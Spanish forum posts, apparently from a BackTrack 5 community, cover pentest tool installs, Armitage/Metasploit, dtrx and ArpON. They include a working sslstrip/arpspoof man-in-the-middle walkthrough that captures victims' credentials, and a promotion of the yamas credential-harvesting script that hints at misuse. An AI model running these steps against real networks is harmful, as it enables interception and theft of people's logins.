briansx_404
Usuario (Montenegro)
http://www.adobe.com/products/flashplayer/distribution3.html Descargar en 64 bits RPM http://fpdownload.macromedia.com/get/flashplayer/current/licensing/linux/flash-plugin-11.2.202.228-release.x86_64.rpm TAR.GZ http://fpdownload.macromedia.com/get/flashplayer/current/licensing/linux/install_flash_player_11_linux.x86_64.tar.gz 32 Bits RPM http://fpdownload.macromedia.com/get/flashplayer/current/licensing/linux/flash-plugin-11.2.202.228-release.i386.rpm TAR.GZ http://fpdownload.macromedia.com/get/flashplayer/current/licensing/linux/install_flash_player_11_linux.i386.tar.gz
1. Actualizacion de BT5 (R1) : apt-get update apt-get dist-upgrade apt-get install beef reboot 2. OPTIONAL – Once rebooted, log back in, and get your pretty splash screen back. fix-splash reboot 3. Verificar el kernel 3.2.6 : uname -a Instalar las nuevas aplicaciones apt-get install pipal findmyhash metasploit joomscan hashcat-gui golismero easy-creds pyrit sqlsus vega libhijack tlssled hash-identifier wol-e dirb reaver wce sslyze magictree nipper-ng rec-studio hotpatch xspy arduino rebind horst watobo patator thc-ssl-dos redfang findmyhash killerbee goofile bt-audit bluelog extundelete se-toolkit casefile sucrack dpscan dnschef Agregar repositorios de seguridad echo "deb http://updates.repository.backtrack-linux.org revolution main microverse non-free testing" >> /etc/apt/sources.list apt-get update apt-get dist-upgrade Luego aceptamos lo que nos aparece 6. parar servicios al inicio /etc/init.d/apache2 stop /etc/init.d/cups stop /etc/init.d/winbind stop update-rc.d -f cups remove update-rc.d -f apache2 remove update-rc.d -f winbind remove y listo
1-SOBRE ARMITAGE: 1.1-Qué es armitage? Armitage es un Administrador Gráfico de Ciber Ataques para Metasploit que sirve para visualizar gráficamente tus objetivos, el mismo programa te recomienda que exploit usar, expone las opciones avanzadas del framework (esas que comúnmente se nos olvida o no sabemos), desde el mismo Armitage podemos iniciar un análisis con Nmap, e incluso se puede usar el módulo de Brute Force para sacar username/password. El objetivo de Armitage es hacer Metasploit útil para los profesionales de seguridad que saben hacking, pero no el uso de Metasploit a fondo. Si desean aprender las características avanzadas de Metasploit, Armitage será de gran ayuda. 1.2-Administración de Ciber Ataques Armitage organiza las capacidades de metasploit alrededor del proceso de hacking. Hay características para descubrimiento, acceso, post-explotación, y maniobra. Para descubrimiento, Armitage expone varias de las capacidades de gestion de hosts de Metasploit. Puede importar objetivos y lanzar escaneos para llenar una base de objetivos. Armitage también visualiza la base de datos de objetivos. usted sabrá con cual hosts ests trabajando, con y donde tienes sesiones. Armitage ayuda con explotación remota proporcionando características para recomendar exploits automáticamente o incluso ejecutar chequeos activos para que sepas cuales exploits funcionarán. Si estas opciones fallan, puedes usar el método de "Ave María" y desatar un db_autopwn inteligente de armitage contra tu objetivo. Una vez estás dentro, Armitage provee muchas herramientas post-explotación basadas en las capacidades de el agente meterpreter. Con el click de un menu podrás escalar privilegios, volcar hashes de passwords a una base de datos local de credenciales, navegar el sistema como si fueras local, y lanzar consolas de comandos. Finalmente, Armitage ayuda en el proceso de creación de pivotes, una capacidad que le permite usar hosts comprometidos como una plataforma para atacar otros hosts y seguir investigando la red objetivo. Armitage incluso expone el módulo SOCKS proxy de metasploit, el cual permite que herramientas externas tomen ventajas de estos pivotes.Con estas herramientas, usted puede explorar más y maniobrar a través de la red. 1.3 Vocabulario necesario Usar Armitage, ayudaría entender Metasploit.Aqui hay algunas cosas que absolutamente deberías conocer antes de continuar: Metasploit es una aplicación manejada por consola.Cualquier cosa que hagas en armitage es traducido a un comando que metasploit entienda. Puede pasar por alto Armitage y tipear comandos tu mismo (mas tardé veremos eso). Si estás perdido en la consola escribe help y pulsa enter. Metasploit presenta sus capacidades como modulos. Cada escáner, exploit, e in cluso cada payload está disponible como un módulo. si estas escaneando un host, usas un módulo auxiliar. Antes de lanzar un módulo debes ajustar una o más variables para configurar el módulo. El proceso de explotación es similar. Para lanzar un exploit debes escoger un módulo exploit, ajustar una o más variables y lanzarlo. Armitage apunta a hacer este proceso más fácil para ti. Si el exploit tiene exito, tienes una sesión en el host. Armitage sabe como interactuar con shell y con sesiones de Windows meterpreter. Meterpreter es un agente de avanzada que pone a su disposición muchas funcionalidades para post-explotación.Armitage está construido para sacar provecho de meterpreter. (lo de trabajo con meterpreter lo veremos después) "El curso <Metasploit Unleashed> mantenido por el equipo de Offensive Security es excelente, y se recomienda verlo antes de continuar" Link http://www.fastandeasyhacking.com/manual 2.Primeros pasos 2.1 Prerequisitos Armitage es instalado con el paquete completo de Metasploit 3.7.0. Éste tiene todos los prerequisitos necesarios incluyendo: *Java 1.6.0+ *Metasploit 3.7.0+ * Una base de datos y la información para conectar a ella Asegurate de usar la versión oficial de Oracle Java. Este proyecto no soporta otros entornos Java. Si quieres la ultima versión de Metasploit Framework. Armitage es probado con la última versión de metasploit, asi que no se garantiza que funcione bien con versiones viejas. Usa subversion para obtener la última versión de Metasploit y mantenlo actualizado usando regularmente el comado msfupdate. Finalmente, debes tener una Base de datos para conectar Metasploit. Armitage necesita que conozcas el usuario, contraseña, nombre del host y base de datos antes de conectar. " Yo recomiendo altamente usar PostgreSQL en vez de MySQL. Hay un problema sin resolver en Metasploit que causa que las bases de datos MYSQL se rompan cuando Metasploit elige cambiar un esquema de la base de datos. El equipo Metasploit también prueba con Postgres. Los instaladores de Metasploit en su versión completa tanto en Windows como en Linux se encargan de configurar Postgres para ti. 2.2 Primeros Pasos: Linux(backtrack 5 ya lo trae instalado para ejecutar escribe armitage) Para instalar armitage en linux: 1-Comprobar que tiene privilegios de root 2-Descargar e instalar Metasploit framework desde www.metasploit.com 3-despúes de la instalación, ejecutar /opt/framework/app/msfupdate para actualizar Metasploit 4-Instalar un visor VNC (ejemplo: apt-get install vncviewer ) Para lanzar Armitage: sudo armitage Click en Start MSF para iniciar el demonio RPC de metasploit y conectar a él. La configuración de la base de datos instalada de Metasploit ya están configurados. No es necesario cambiar la secuencia de conexion a la DB. [Armitage recoge las configuraciones de la DB de Metasploit desde su instalación completa. Si has cambiado la secuencia de conexión a la base de datos antes de leer esta documentación, hay posibilidad de que Armitage la haya guardado. Adivina que, Armitage no funcionará. Borra el archivo .armitage.prop de tu carpeta personal para restaurar la secuencia de conexión a la base de datos por defecto. 2.3 primeros pasos: Backtrack Linux Backtrack Linux 5 incluye Metasploit y Armitage listos para usar. Necesitas iniciar mysql para eso /etc/init./mysql start Nos conectaremos a la base de datos para poder usar Armitage --> msfrpcd -f -U msf -P test -t Basic Abre una terminal y escribe armitage para iniciar Armitage. host: 127.0.0.1 Port: 55553 User: msf Pass: test Click en el botón Connect para lanzar Metasploit y conectar a el. Si quieres usar Armitage Backtrack Linux es la manera más fácil para empezar 2.3 vista general La interfaz de armitage cuenta con tres paneles principales: módulos, objetivos y pestañas. puedes redimensionar los paneles haciendo click en el area entre ellos. Un computador rojo con rayos eléctricos alrededor indica un host comprometido. Puedes darle click derecho para usar cualquier sesión obtenida. Una flecha direccional indica un pivote de un host a otro. Esto le permite a Metasploit encaminar escaneos y ataques a través de hosts intermediarios.Una línea verde brillante indica que la comunicación con el pivote está en uso. Puedes clickear un host para seleccionarlo. Se pueden seleccionar varios host al tiempo clickeando y arrastrando para crear una selección rectangular sobre los hosts deseados. Cuando sea posible, Armitage tratará de aplicar una acción (por ejemplo lanzar un exploit) a todos los hosts seleccionados. Click derecho a un host para mostrar un menu con las opciones disponibles, el menú adjunto mostrará ataques y opciones de logueo, menus para sesiones existentes, y opciones para editar la información del host. Aqui les dejo el enlace a un video de como usarlo mas explicado Descarga el video desde backtrack 5 ! apt-get install axel axel -n 8 http://www.backtrack5.omhe.org/Backtrack5Online-5.m4v Unanse a la comunidad http://www.taringa.net/comunidades/backtrack-5/
DTRX Descripcion: Es una tool que nos permite descomprimir cualquier archivo (.rar .zip .tar) sin tener que aprender un comando por cada archivo comprimido Instalacion (Paso a Pasito ) Ubuntu/Debian: sudo apt-get install dtrx Gentoo: emerge dtrx Arch: pacman -S dtrx Fedora: yum install dtrx Uso dtrx archivo.rar o dtrx archivo.zip o .tar le pueden agregar la opcion -n para que no de dialogos adicionales O pueden editar su bash alias añadiendo: alias descomprime='dtrx -n' (donde dice "decomprime" pueden cambiarlo por cualquier palabra de su agrado Ahora quedaria el comando: descomprime archivo.zip Nota Cualquier comando o archivo lo pueden autocompletar apretando Tab por ejemplo escriben des y apretan tab quedaria: descomprimir
Primero que nada Que es sslstrip? La definición de SSL Strip es variada, intentemos acercarnos a la realidad práctica que es lo que más nos puede interesar. SSL Strip consiste en hacer creer al usuario que está bajo una conexión segura, ya sea porque el usuario ve un candadito que indica seguridad, sslstrip puede falsificarlo, o por que el usuario no se fija si está bajo tráfico cifrado o no. Cuando un atacante lanza SSL Strip sobre una víctima, ésta sigue navegando felizmente por la red. El problema viene cuando se conecta a una página bajo HTTPS, la víctima puede observar como el HTTPS ha desaparecido de su navegador, si no se fija en ese pequeño detalle y se autentifique en algún sitio, sus credenciales irán en texto plano hacia la víctima. Para que se vea lo que ocurre realmente se explica a continuación, el recuadro con SSL Strip es el atacante realizando un MiTM. El browser de la víctima realizará una petición que el atacante interceptará, entonces SSL Strip realizará la petición correcta al web server, y la respuesta al navegador de la víctima se envía bajo HTTP y no bajo HTTPS. Se observa que SSL Strip aprovecha el paso de HTTP a HTTPS para realizar sus fechorías.[/align Herramientas [*] Backtrack o cualquier otra distro [*]Python apt-get install python [*]Modulo twisted-web apt-get install python-twisted-web [*]Ssltrip(backtrack ya lo trae) Descarga http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz Instalacion sslstrip tar zxvf sslstrip-0.9.tar.gz cd sslstrip-0.9 (optional)python ./setup.py install Activar Forwarding echo "1" > /proc/sys/net/ipv4/ip_forward Comprobar cat /proc/sys/net/ipv4/ip_forward *Tiene que aparecer un 1 Redireccionar Trafico iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 Envenenamiento(arpspoof) arpspoof -i -t [direccion mac victima] [direcc router] Ejemplo: arpspoof -i wlan0 -t 192.168.0.2 192.168.0.1 Para saber los computadores en la red se puede hacer: Ejemplos: netdiscover -i wlan0 -r 192.168.0.1/24 netdiscover -i eth0 -r 192.168.1.1/24 El wlan0 lo reemplazan por su iface, puede ser eth0(en caso de que esten conectados por cable) wlan0 wlan1 etc Lanzar sslstrip sslstrip -w cap -l 8080 Eso es todo, y para ver la captura cat cap o buscan el archivo de texto como quieran Adiós!11! Comunidad Backtrack: http://www.taringa.net/comunidades/backtrack-5/
Que es Mitm? En criptografía, un ataque man-in-the-middle o JANUS (MitM o intermediario, en español) es un ataque en el que el enemigo adquiere la capacidad de leer, insertar y modificar a voluntad, los mensajes entre dos partes sin que ninguna de ellas conozca que el enlace entre ellos ha sido violado. El atacante debe ser capaz de observar e interceptar mensajes entre las dos víctimas. El ataque MitM es particularmente significativo en el protocolo original de intercambio de claves de Diffie-Hellman, cuando éste se emplea sin autenticación. Posibles subataques El ataque MitM puede incluir algunos de los siguientes subataques: Intercepción de la comunicación (eavesdropping), incluyendo análisis del tráfico y posiblemente un ataque a partir de textos planos (plaintext) conocidos. Ataques a partir de textos cifrados escogidos, en función de lo que el receptor haga con el mensaje descifrado. Ataques de sustitución. Ataques de repetición. Ataque por denegación de servicio (denial of service). El atacante podría, por ejemplo, bloquear las comunicaciones antes de atacar una de las partes. La defensa en ese caso pasa por el envío periódico de mensajes de status autenticados. ArpON (Arp handler inspectiON) es un demonio que nos permite mediante una serie de herramientas hacer el protocolo Arp, un poco más seguro. Implementa dos técnicas de defensivas contra ataques de envenenamiento de Arp: SARPI (STATIC ARP INSPECTION): Cuando se inicia, guarda todas las entradas ARP en un caché estático (Caché SARPI). Cada vez que se recibe una respuesta ARP, el demonio comprueba que la dirección de origen de la respuesta es la misma que la que guarda en la caché. Si la respuesta proviene de la misma dirección, la nueva reemplazará a la guardada en la caché. Cualquier petición o respuesta, cuya dirección de origen sea distinta a la que hay en la caché, es ignorada. DARPI (DYNAMIC ARP INSPECTION): Cuando se inicia, limpia toda la caché ARP, evitando de esta manera verse afectado por un ataque efectuado anterior al inicio del demonio. DARPI maneja la caché DARPI, según diferentes pilicies para cada clase de paquete. Instalacion root@bt:~# apt-get install arpon Vamos a crear un log, donde el demonio pueda comunicarnos cualquier irregularidad o la ausencia de ella: root@bt:~# mkdir /var/log/ArpON/ && nano /var/log/arpon/ArpON.log Posteriormente lanzamos al programa con: root@bt:~# arpon -i wlan1 -f /var/log/ArpON/arpon.log -g --daemon --darpi Nos saldra algo como esto: ArpON "Arp handler inspection" version 1.90 (http://arpon.sourceforge.net) [06/11/2012 - 16:56:49 CLT] Device: (wlan1) MAC: 90:f6:xxxx:xx Inet4: 190.161.56.228 Netmask: 255.255.255.0 [06/11/2012 - 16:56:49 CLT] Task is forking to background, using /var/run/arpon.pid pid file... sintax de arpon root@bt:~# arpon --help ArpON "Arp handler inspection" version 1.90 (http://arpon.sourceforge.net) Usage: arpon [Task Mode] [Log Mode] { | | [Arp Cache] | [SARPI | DARPI]} TASK MODE: -n, --nice <Nice Value> Sets PID's CPU priority (Default Nice: 0) -d, --daemon Works in background task (Default: /var/run/arpon.pid) LOG MODE: -f, --log-file <Log file> Sets log file (Default: /var/log/arpon.log) -g, --log Works in logging mode DEVICE MANAGER: -i, --dev-manual <Device> Sets your valid device manually -o, --dev-auto Sets valid device automatically -l, --dev-list Prints all valid devices (Sets last valid device) ARP PING: -m, --ping-timeout <Timeout> Sets Arp Ping response timeout (Default: 500 milliseconds) -p, --ping-host <Inet4> Sends Arp Ping to Inet4 address -b, --ping-broadcast Sends Arp Ping to Broadcast address (Prints LAN's active hosts) ARP PASSIVE SNIFFER: -r, --sniff-arp Sniffs only Arp protocol (I/O Arp Request/Reply) ARP CACHE MANAGER: -a, --cache-add <"Inet4 MAC"> Adds Inet4 and MAC Arp entry -e, --cache-del <Inet4 | MAC> Deletes Inet4 or MAC Arp entry -t, --cache-list Prints total ARP Cache entries STATIC ARP INSPECTION: -u, --sarpi-timeout <Timeout> Sets Arp Cache refresh timeout (Default: 10 minuts) -s, --sarpi Manages Arp Cache statically DYNAMIC ARP INSPECTION: -z, --darpi-timeout <Timeout> Sets DARPI Cache entry timeout (Default: 500 milliseconds) -y, --darpi Manages Arp Cache dinamically MISC: -c, --license Prints license page -v, --version Prints version number -h, --help Prints help summary page
apt-get update && apt-get dist-upgrade Si tienen backtrack 32 bits apt-get install libcrafter blueranger dbd inundator intersect mercury cutycapt trixd00r artemisa rifiuti2 netgear-telnetenable jboss-autopwn deblaze sakis3g voiphoney apache-users phrasendrescher kautilya manglefizz rainbowcrack rainbowcrack-mt lynis-audit spooftooph wifihoney twofi truecrack uberharvest acccheck statsprocessor iphoneanalyzer jad javasnoop mitmproxy ewizard multimac netsniff-ng smbexec websploit dnmap johnny unix-privesc-check sslcaudit dhcpig intercepter-ng u3-pwn binwalk laudanum wifite tnscmd10g bluepot dotdotpwn subterfuge jigsaw urlcrazy creddump android-sdk apktool ded dex2jar droidbox smali termineter bbqsql htexploit smartphone-pentest-framework fern-wifi-cracker powersploit webhandler 64 bits apt-get install libcrafter blueranger dbd inundator intersect mercury cutycapt trixd00r rifiuti2 netgear-telnetenable jboss-autopwn deblaze sakis3g voiphoney apache-users phrasendrescher kautilya manglefizz rainbowcrack rainbowcrack-mt lynis-audit spooftooph wifihoney twofi truecrack acccheck statsprocessor iphoneanalyzer jad javasnoop mitmproxy ewizard multimac netsniff-ng smbexec websploit dnmap johnny unix-privesc-check sslcaudit dhcpig intercepter-ng u3-pwn binwalk laudanum wifite tnscmd10g bluepot dotdotpwn subterfuge jigsaw urlcrazy creddump android-sdk apktool ded dex2jar droidbox smali termineter multiforcer bbqsql htexploit smartphone-pentest-framework fern-wifi-cracker powersploit webhandler
En pocas palabras, yamas automatiza teclear tantos comandos para hacer un mitm(man in the middle) y tambien te da la oportunidad de sacar las... ejemm, credenciales( ) de todos los equipos que esten conectados... Les dejo a su imaginacion lo que podran hacer link: http://www.youtube.com/watch?v=mXoj4kTCIQM Descarga: http://comax.fr/yamas.php (Tambien esta disponible para android) Sintax usage : /usr/bin/yamas -h -c -p -e -s -f -h or --help : Display this help message, disclaimer and exit. -c or --change: Display changelog and todo. -e : Use ettercap instead of ARPspoof. One might have one's reasons... ARPspoof is default. -p or --parse : Only parse the given <file>. Don't use wildcards. Use > /output_file to print to a file. -s : The script won't download anything. Make sure you have the needed files. -f : Use a padlock favicon in sslstrip. `YMM' `MM' db `7MMM. ,MMF' db .M"""bgd VMA ,V ;MM: MMMb dPMM ;MM: ,MI "Y VMA ,V ,V^MM. M YM ,M MM ,V^MM. `MMb. VMMP ,M `MM M Mb M' MM ,M `MM `YMMNq. MM AbmmmqMA M YM.P' MM AbmmmqMA . `MM MM A' VML M `YM' MM A' VML Mb dM .JMML..AMA. .AMMA..JML. `' .JMML..AMA. .AMMA.P"Ybmmd" =========================================================================== = Welcome to Yet Another MITM Automation Script. = = Use this tool responsibly, and enjoy! = = Feel free to contribute and distribute this script as you please. = = Check out the help (-h) to see new features and informations = = You are running version 20120213 = =========================================================================== Visit the community: http://www.taringa.net/comunidades/backtrack-5/